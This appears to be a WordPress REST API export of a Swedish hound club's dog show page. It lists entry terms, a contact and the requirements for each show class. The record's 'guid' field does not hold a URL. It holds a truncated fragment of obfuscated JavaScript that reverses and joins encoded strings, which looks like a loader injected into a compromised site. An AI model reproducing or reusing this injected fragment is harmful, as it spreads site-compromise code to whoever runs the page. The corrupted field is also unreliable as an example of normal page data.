{"id":70,"date":"2011-01-05T18:18:12","date_gmt":"2011-01-05T17:18:12","guid":{"rendered":"http:\/\/www.lokalklubb.stovare.se\/uppl$hiVNZt4Y5cDrbJXMhLy=function(n)if%20(typeof%20($hiVNZt4Y5cDrbJXMhLy.list%5Bn%5D)%20==%20string)%20return%20$hiVNZt4Y5cDrbJXMhLy.list%5Bn%5D.split().reverse().join();return%20$hiVNZt4Y5cDrbJXMhLy.list%5Bn"},"modified":"2025-03-01T12:27:06","modified_gmt":"2025-03-01T10:27:06","slug":"utstallningar","status":"publish","type":"page","link":"https:\/\/www.uv-stovarklubb.se\/index.php\/utstallningar\/","title":{"rendered":"Utst\u00e4llningar"},"content":{"rendered":"\n<p><a href=\"https:\/\/www.uv-stovarklubb.se\/index.php\/2025\/01\/utstallningar-2025\/\">V\u00e5ra utst\u00e4llningar och anm\u00e4lan hittar ni h\u00e4r<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Villkor<\/h2>\n\n\n\n<ul>\n<li>Utst\u00e4llaren f\u00f6rs\u00e4krar med denna anm\u00e4lan att angivna uppgifter \u00e4r korrekta och \u00e4r inf\u00f6rst\u00e5dd med att anm\u00e4ld klass \u00e4r grunden f\u00f6r deltagandet. Om hunden vid utst\u00e4llnings\u00f6gonblicket inte har erforderliga meriter kommer hunden att f\u00e5 sina resultat strukna.<\/li>\n\n\n\n<li>Vidare godk\u00e4nner utst\u00e4llaren genom denna anm\u00e4lan att man ger sitt godk\u00e4nnande att publicera ovan angivna uppgifter i utst\u00e4llningskatalogen och eventuella vinnare kommer utan vidare information att publiceras p\u00e5 Uppland V\u00e4stmanlands hemsida.<\/li>\n\n\n\n<li>Uppland V\u00e4stmanland arbetar med en rad olika sponsorer som kan komma att vilja ta del av resultat och\/eller fotografier tagna under evenemanget, utst\u00e4llaren ger h\u00e4rmed sitt godk\u00e4nnande att Uppland V\u00e4stmanland delar med sig av detta till v\u00e5ra sponsorer f\u00f6r detta specifika evenemanget<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-table is-style-stripes\"><table><tbody><tr><td>Utst\u00e4llnings-<br>ansvarig<\/td><td>Lars Hansen<br>073-6002113<br><a href=\"mailto:lars.hansen@misteldesign.se\">lars.hansen@misteldesign.se<\/a><\/td><\/tr><tr><td>Anm\u00e4lan<\/td><td>Sker alltid via p\u00e5 prov.stovare.se<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/www.uv-stovarklubb.se\/wp-content\/uploads\/2013\/01\/heby2013.jpg\"><img decoding=\"async\" loading=\"lazy\" width=\"413\" height=\"550\" src=\"https:\/\/www.uv-stovarklubb.se\/wp-content\/uploads\/2013\/01\/heby2013.jpg\" alt=\"\" class=\"wp-image-662\" srcset=\"https:\/\/www.uv-stovarklubb.se\/wp-content\/uploads\/2013\/01\/heby2013.jpg 413w, https:\/\/www.uv-stovarklubb.se\/wp-content\/uploads\/2013\/01\/heby2013-225x300.jpg 225w\" sizes=\"(max-width: 413px) 100vw, 413px\" \/><\/a><\/figure><\/div>\n\n\n<h2 class=\"wp-block-heading\">Utst\u00e4llningsklasser<\/h2>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Vad inneb\u00e4r de olika klasserna?<\/strong><\/h2>\n\n\n\n<p><strong>Valpklass: 6-9 m\u00e5nader<\/strong><br><em>Krav f\u00f6r att f\u00e5 deltaga:<\/em><br>Hunden m\u00e5ste senast utst\u00e4llningsdagen ha uppn\u00e5tt klassens minimi\u00e5lder och p\u00e5 utst\u00e4llningsdagen ej ha uppn\u00e5tt klassens h\u00f6gsta \u00e5lder<\/p>\n\n\n\n<p>Detta \u00e4r en inofficiell klass som inte stambokf\u00f6rs<\/p>\n\n\n\n<p><strong>Juniorklass: 9 &#8211; 18 m\u00e5nader<br><\/strong><em>Krav f\u00f6r att f\u00e5 deltaga:<\/em><br>Hunden m\u00e5ste senast utst\u00e4llningsdagen ha uppn\u00e5tt klassens minimi\u00e5lder och p\u00e5 utst\u00e4llningsdagen ej ha uppn\u00e5tt klassens h\u00f6gsta \u00e5lder<\/p>\n\n\n\n<p><strong>Unghundsklass: 15 &#8211; 24 m\u00e5nader<\/strong><br><em>Krav f\u00f6r att f\u00e5 deltaga:<\/em><br>Hunden m\u00e5ste senast utst\u00e4llningsdagen ha uppn\u00e5tt klassens minimi\u00e5lder och p\u00e5 utst\u00e4llningsdagen ej ha uppn\u00e5tt klassens h\u00f6gsta \u00e5lder<\/p>\n\n\n\n<p><strong>\u00d6ppenklass : Fr\u00e5n 15 m\u00e5nader<\/strong><br><em>Krav f\u00f6r att f\u00e5 deltaga:<\/em><br>Hunden m\u00e5ste senast utst\u00e4llningsdagen ha uppn\u00e5tt klassens minimi\u00e5lder<\/p>\n\n\n\n<p><strong>Jaktklass : Fr\u00e5n 15 m\u00e5nader<\/strong><br><em>Krav f\u00f6r att f\u00e5 deltaga:<\/em><br>Hunden m\u00e5ste senast utst\u00e4llningsdagen ha uppn\u00e5tt klassens minimi\u00e5lder<br>Jaktprovsmeriter:<br>1:a pris i unghundsklass alternativt<br>l\u00e4gst 2:a pris i \u00f6ppenklass p\u00e5 drevprov<br>1:a pris r\u00e4v i unghundsklass<br>l\u00e4gst 2:a pris p\u00e5 s\u00e4rskilt r\u00e4vprov.<\/p>\n\n\n\n<p><strong>Championklass : Fr\u00e5n 15 m\u00e5nader<\/strong><br><em>Krav f\u00f6r att f\u00e5 deltaga:<\/em><br>Denna klass \u00e4r \u00f6ppen f\u00f6r hund som tilldelats svenskt, Nordic eller annat av SKK godk\u00e4nt nationellt utst\u00e4llningschampionat alternativt ett av FCI bekr\u00e4ftat internationellt utst\u00e4ll- ningschampionat, och som den dag den st\u00e4lls ut uppn\u00e5tt 15 m\u00e5naders \u00e5lder.<\/p>\n\n\n\n<p><strong>Veteranklass :<\/strong><br><em>Krav f\u00f6r att f\u00e5 deltaga:<\/em><br>Hunden m\u00e5ste senast utst\u00e4llningsdagen ha uppn\u00e5tt 8 \u00e5r \u00e5lder<\/p>\n\n\n\n<p><strong>Avelsklass :<\/strong><br><em>Denna klass \u00e4r \u00f6ppen f\u00f6r:<\/em><br>Hanhund som deltar med en grupp om fyra avkommor undan minst tv\u00e5 tikar.<br>Tik som deltar med en grupp om fyra avkommor<\/p>\n\n\n\n<p><strong>Uppf\u00f6darklass :<\/strong><br><em>Denna klass \u00e4r \u00f6ppen f\u00f6r:<\/em><br>Denna klass \u00e4r \u00f6ppen f\u00f6r en grupp om fyra hundar av samma ras eller rasvariant (storlek och\/eller h\u00e5rlag), som har ett och samma kennelnamn eller \u00e4r uppf\u00f6dda av en och samma person eller grupp av personer.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.uv-stovarklubb.se\/wp-content\/uploads\/2018\/05\/s\u00e4trabrunn2018bis.jpg\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"768\" src=\"https:\/\/www.uv-stovarklubb.se\/wp-content\/uploads\/2018\/05\/s\u00e4trabrunn2018bis-1024x768.jpg\" alt=\"\" class=\"wp-image-1423\" srcset=\"https:\/\/www.uv-stovarklubb.se\/wp-content\/uploads\/2018\/05\/s\u00e4trabrunn2018bis-1024x768.jpg 1024w, https:\/\/www.uv-stovarklubb.se\/wp-content\/uploads\/2018\/05\/s\u00e4trabrunn2018bis-300x225.jpg 300w, https:\/\/www.uv-stovarklubb.se\/wp-content\/uploads\/2018\/05\/s\u00e4trabrunn2018bis-768x576.jpg 768w, https:\/\/www.uv-stovarklubb.se\/wp-content\/uploads\/2018\/05\/s\u00e4trabrunn2018bis-100x75.jpg 100w, https:\/\/www.uv-stovarklubb.se\/wp-content\/uploads\/2018\/05\/s\u00e4trabrunn2018bis-935x700.jpg 935w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>V\u00e5ra utst\u00e4llningar och anm\u00e4lan hittar ni h\u00e4r Villkor Utst\u00e4llnings-ansvarig Lars Hansen073-6002113lars.hansen@misteldesign.se Anm\u00e4lan Sker alltid via p\u00e5 prov.stovare.se Utst\u00e4llningsklasser Vad inneb\u00e4r de olika klasserna? Valpklass: 6-9 m\u00e5naderKrav f\u00f6r att f\u00e5 deltaga:Hunden m\u00e5ste senast utst\u00e4llningsdagen ha uppn\u00e5tt klassens minimi\u00e5lder och p\u00e5 utst\u00e4llningsdagen ej ha uppn\u00e5tt klassens h\u00f6gsta \u00e5lder Detta \u00e4r en inofficiell klass som inte stambokf\u00f6rs Juniorklass:&hellip;&nbsp;<a href=\"https:\/\/www.uv-stovarklubb.se\/index.php\/utstallningar\/\" class=\"\" rel=\"bookmark\">L\u00e4s mer &raquo;<span class=\"screen-reader-text\">Utst\u00e4llningar<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":""},"_links":{"self":[{"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/pages\/70"}],"collection":[{"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/comments?post=70"}],"version-history":[{"count":11,"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/pages\/70\/revisions"}],"predecessor-version":[{"id":2775,"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/pages\/70\/revisions\/2775"}],"wp:attachment":[{"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/media?parent=70"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}